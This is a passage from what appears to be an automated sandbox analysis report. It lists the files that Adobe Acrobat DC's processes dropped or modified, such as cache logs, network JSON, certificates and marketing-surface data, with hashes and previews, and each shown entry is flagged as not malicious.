                                                                                  Preview:2024/12/19-06:44:33.083 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:44:33.084 674 Recovering log #3.2024/12/19-06:44:33.085 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):341
                                                                                  Entropy (8bit):5.25516706424098
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PlUVq2PcNwi2nKuAl9Ombzo2jMGIFUt8OPlR80gZmw+OPlRAIkwOcNwi2nKuAlx:7PWvLZHAa8uFUt8OPLM/+OPXD54ZHAaU
                                                                                  MD5:BBD7E9F8BB6003846AF63200AA406636
                                                                                  SHA1:AE62A49978A47DE3DFB0E46814BB4AAD369B781B
                                                                                  SHA-256:1309C6BB4822F48C3E25EE7F82AE669A57CFCF445688BED52D1CD421D5393EF2
                                                                                  SHA-512:1DA39A9626F1353EB56C320A5038CDC36399D4408A819B9380BDDE8AD5723D4596B5470A8D7A79500BF2C7DE7C3E62ECE64A9D24CE92613AA30364A7ABC77694
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.083 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:44:33.084 674 Recovering log #3.2024/12/19-06:44:33.085 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5b1e87fe-5e13-4fe3-9151-635b94641de9.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:JSON data
                                                                                  Category:modified
                                                                                  Size (bytes):475
                                                                                  Entropy (8bit):4.96775079901533
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:YH/um3RA8sq5NsBdOg2H90caq3QYiubSpDyP7E4TX:Y2sRdspdMHt3QYhbSpDa7n7
                                                                                  MD5:447F2FA7D23630661C00083D4C2048C9
                                                                                  SHA1:8E05FA35124627824C336AFFC0827DDB09234A8F
                                                                                  SHA-256:C70A336A0B1E0CA6128D54D2AC6DFB62AB2B1799BF0750B639AF148E71B34152
                                                                                  SHA-512:9179A7E8C0F3D532F718BC8E34CE68E5BD67D9997FB34FBBFFB0719547F1F1AA0F807E6FAD223DA9470BF160E110C0B439543059E343DEC526CFFA3C55C98F13
                                                                                  Malicious:false
                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168682704213","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":633697},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):475
                                                                                  Entropy (8bit):4.96775079901533
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:YH/um3RA8sq5NsBdOg2H90caq3QYiubSpDyP7E4TX:Y2sRdspdMHt3QYhbSpDa7n7
                                                                                  MD5:447F2FA7D23630661C00083D4C2048C9
                                                                                  SHA1:8E05FA35124627824C336AFFC0827DDB09234A8F
                                                                                  SHA-256:C70A336A0B1E0CA6128D54D2AC6DFB62AB2B1799BF0750B639AF148E71B34152
                                                                                  SHA-512:9179A7E8C0F3D532F718BC8E34CE68E5BD67D9997FB34FBBFFB0719547F1F1AA0F807E6FAD223DA9470BF160E110C0B439543059E343DEC526CFFA3C55C98F13
                                                                                  Malicious:false
                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379168682704213","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":633697},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4099
                                                                                  Entropy (8bit):5.231840796680241
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP26B+:CwNw1GHqPySfkcigoO3h28ytP26B+
                                                                                  MD5:A639FD3E4D5ACAA9F0815FE34AF35D46
                                                                                  SHA1:6ECAF63203F220C17B0928CC6A04256B3DD70F64
                                                                                  SHA-256:73024A082AC957A9EF46F34BA64209D3E05CC995495C7BB9091C5CA8B478EA2A
                                                                                  SHA-512:210C332DD021D115D658D817B25491519F38A246BA1DF6E954FBDCA9812C586909453860E44D344ADCBCC24E06EA4FD59AADA24EDAF7B6DCE675A40AB61A3982
                                                                                  Malicious:false
                                                                                  Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):329
                                                                                  Entropy (8bit):5.231414091343518
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PbRFOSVq2PcNwi2nKuAl9OmbzNMxIFUt8OPZ/FwgZmw+OP4lIkwOcNwi2nKuAlG:7PbRRvLZHAa8jFUt8OP1FZ/+OPH54ZHP
                                                                                  MD5:DB7C5FB2D061537B8D4EEE99D020C00B
                                                                                  SHA1:CD1DF5712EAA66C04BF2AF60A3A572D24E3898A3
                                                                                  SHA-256:C3C58F6C1DF5477F57A0D1DFC7F10169A7AFDAC25E9BF2F4BDDCF7C040E059D1
                                                                                  SHA-512:7B5C176B228240A81B93526AD12C08167C44EB286482B864FA9948B407AE4A54FA3E8D6A1005CC55CB825DBA5F1DD158519176658C54F34D9D0AA7DEC19404D5
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.604 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:44:33.629 674 Recovering log #3.2024/12/19-06:44:33.636 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):329
                                                                                  Entropy (8bit):5.231414091343518
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PbRFOSVq2PcNwi2nKuAl9OmbzNMxIFUt8OPZ/FwgZmw+OP4lIkwOcNwi2nKuAlG:7PbRRvLZHAa8jFUt8OP1FZ/+OPH54ZHP
                                                                                  MD5:DB7C5FB2D061537B8D4EEE99D020C00B
                                                                                  SHA1:CD1DF5712EAA66C04BF2AF60A3A572D24E3898A3
                                                                                  SHA-256:C3C58F6C1DF5477F57A0D1DFC7F10169A7AFDAC25E9BF2F4BDDCF7C040E059D1
                                                                                  SHA-512:7B5C176B228240A81B93526AD12C08167C44EB286482B864FA9948B407AE4A54FA3E8D6A1005CC55CB825DBA5F1DD158519176658C54F34D9D0AA7DEC19404D5
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.604 674 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:44:33.629 674 Recovering log #3.2024/12/19-06:44:33.636 674 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219131428Z-196.bmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                  Category:dropped
                                                                                  Size (bytes):65110
                                                                                  Entropy (8bit):0.6376462682686903
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                  MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                  SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                  SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                  SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                  Malicious:false
                                                                                  Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                  Category:dropped
                                                                                  Size (bytes):86016
                                                                                  Entropy (8bit):4.439157462977668
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:yeaci5GtiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1BurVgazUpUTTGt
                                                                                  MD5:56CCD1DA7A41DD4CB2EE71389AF234E8
                                                                                  SHA1:913B33E9C3223679D65923EBDF7DFA0F67942DF1
                                                                                  SHA-256:C6525B657863C95A83B856FE33C0C7C70B0FD9B6C84237200695C76057E248C4
                                                                                  SHA-512:6508048B04F44175507BC3AC01DA0431F80086179AB222623180AC8B093D301ECD5AB638B71947FFBD0D334D332DB14B19970B7250907C79023D4C8B25C93DCC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):3.7766890061287954
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7MEp/E2ioyVPioy3DoWoy1CABoy1PKOioy1noy1AYoy1Wioy1hioybioyQoy1noF:7XpjuP0iARXKQVOb9IVXEBodRBkh
                                                                                  MD5:B46E93FB8DC97C40ABE613B5661B8FC8
                                                                                  SHA1:C1496C99B49E93719B3B19C0E43DEFEA20738A62
                                                                                  SHA-256:218ADDFC0E0893B5662BF3069AA209635C6A9E82A520591E39024D164962B02D
                                                                                  SHA-512:2545E65F3C94479A46917EAAB838515D27072FE9C885C7379D3779EB5050A04578A40BC2661E133F263549C2E42321BBBB5CC27E23C24E54E13B285B663BA76B
                                                                                  Malicious:false
                                                                                  Preview:.... .c........=...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Certificate, Version=3
                                                                                  Category:dropped
                                                                                  Size (bytes):1391
                                                                                  Entropy (8bit):7.705940075877404
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                  Malicious:false
                                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                  Category:dropped
                                                                                  Size (bytes):71954
                                                                                  Entropy (8bit):7.996617769952133
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                  Malicious:false
                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):192
                                                                                  Entropy (8bit):2.728204828358771
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:kkFklV0WwfllXlE/HT8kPJtNNX8RolJuRdxLlGB9lQRYwpDdt:kK1WhT86NMa8RdWBwRd
                                                                                  MD5:CB9E7CD02000F7DE8C3D88D1D16B19EC
                                                                                  SHA1:710B9AD5C389F316B98D5215F2A04F9A923A0FC6
                                                                                  SHA-256:6541ABC369837A70384DB24A3FBE3ABEC694EEE55F7E4D84533AB5252D9514C9
                                                                                  SHA-512:1AA0092B006481C674FED9010786712EB9E7E0FF038E3058B155D241D6E737BCBA3061A0DEDFD5AFEE040F41A6C4A4E2C0AA53A77CEDFEA1800FB35C7E41B586
                                                                                  Malicious:false
                                                                                  Preview:p...... ........f.5f.R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.253995428229511
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKibT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:62DImsLNkPlE99SNxAhUe/3
                                                                                  MD5:A5222321CAC7523956C66DC8DA59885E
                                                                                  SHA1:AC883023C3F50AD6DD9F02EA1682F031F053D4D9
                                                                                  SHA-256:9FE8642921B1A253789D019D4853885ABF459B6E726C0E81EA84B2705E7C1FC4
                                                                                  SHA-512:CC1825CF4175CCF83EE1EF442F93DC8B598D7EFB77AEF4919AED626E37F0495F54798DEDF732FF6308D36AAF92320FB1540BB3E9A24113035A1A702EA5094222
                                                                                  Malicious:false
                                                                                  Preview:p...... ........J..y.R..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.375782545800527
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJM3g98kUwPeUkwRe9:YvXKXgWBMVbsdTeODZGMbLUkee9
                                                                                  MD5:7776A449B083085AAF486C08005CD54B
                                                                                  SHA1:9E58E867E34B7046B1D09AA247E0964DF499AE43
                                                                                  SHA-256:20464D921A589893835B6E773F678D712A326E2F5BE547E902ECBE3371490D8C
                                                                                  SHA-512:33BE0B90EA4F4499771CD25DE1B3301BAD80B2D1E7A484EB76A45C342A29CB9249A182255BE1C1BB8AE87E98AC8A9F454F6226411B13C1904886F43768406BA9
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.31020602214183
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfBoTfXpnrPeUkwRe9:YvXKXgWBMVbsdTeODZGWTfXcUkee9
                                                                                  MD5:C5DECA9D681B4430B18D127C72F7F024
                                                                                  SHA1:1523C8E724835FEB6FE02C39CB2F4E20B054324C
                                                                                  SHA-256:2277F78BCE3282A9808F0E545FE9416D42B3853D68F2D99A323F139F1EBD7396
                                                                                  SHA-512:F7EE9882ADA911B8554FF8DE8B57F936C3CC43F10BEB41093C234C95041373988B05FEC80DF12663CD428A4AF393AD64788808E10C0C13F20E26D35ADD016DA0
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):294
                                                                                  Entropy (8bit):5.288158622141189
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfBD2G6UpnrPeUkwRe9:YvXKXgWBMVbsdTeODZGR22cUkee9
                                                                                  MD5:AE2320F1886CDAD00A7B46E5020E0D38
                                                                                  SHA1:D329A9D73FA5F87EC4C238E70CD07D5A3FC8AFE9
                                                                                  SHA-256:B80D4D97EA5A5D1E33DBEB4CD4675BAD143A97ED506F81E2AB3BECE917B5A635
                                                                                  SHA-512:58E46590E3E0DE7AECAAEF8DA959C9D1E3990E618CA72765B006FFDD3B230DFBE9EAF4F24923693B37D718CCD2F58A2037387C966C37CE58992470CE5C14D080
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):285
                                                                                  Entropy (8bit):5.363096608937213
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXgWBMrh4WsGiIPEeOF0YVJ2xoAvJfPmwrPeUkwRe9:YvXKXgWBMVbsdTeODZGH56Ukee9
                                                                                  MD5:7A3C8EF654E43B3878900C39ACE99143
                                                                                  SHA1:3CBE74480964AE3077F9DAF49A8701B1F03A21D0
                                                                                  SHA-256:045D71A5700EBFF4D4CDA67561DE5DBFAFBD3B95E0CF3A06242CD0BA6729F009
                                                                                  SHA-512:B639B89C002F8B8092912046F27360E81ED0FB2C7206CB82DF2B8C60FAD30FF644266A43CA98E8A6F907A48E51FB29805EB419E5D068EC8950AB7B97064E1956
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):1123
                                                                                  Entropy (8bit):5.693891923123173
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6Xg/bmeOapLgE9cQx8LennAvzBvkn0RCmK8czOCCSm:YvfCexhgy6SAFv5Ah8cv/m
                                                                                  MD5:B9F0EA5B3E91036D8FEA30A24AA92429
                                                                                  SHA1:2D3C9B03A00CDEDCC47CB92F5CC049FC3F26EF85
                                                                                  SHA-256:3AD3838A2E2FD984AAB90E62024D7F6D041A8E1453E169CD56B0B41F54AC16DC
                                                                                  SHA-512:599EE211E3CB6B6BCC1A5E8E382123BDFA6686E589BB38620E46ADA3E54E58363FB838A833D2376E5E9A82230071CB0856219EB246E10DD64BD824CD66E2680F
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"d97c0f31-a7b6-4dff-89af-f77197cdf0f6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734781575432,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

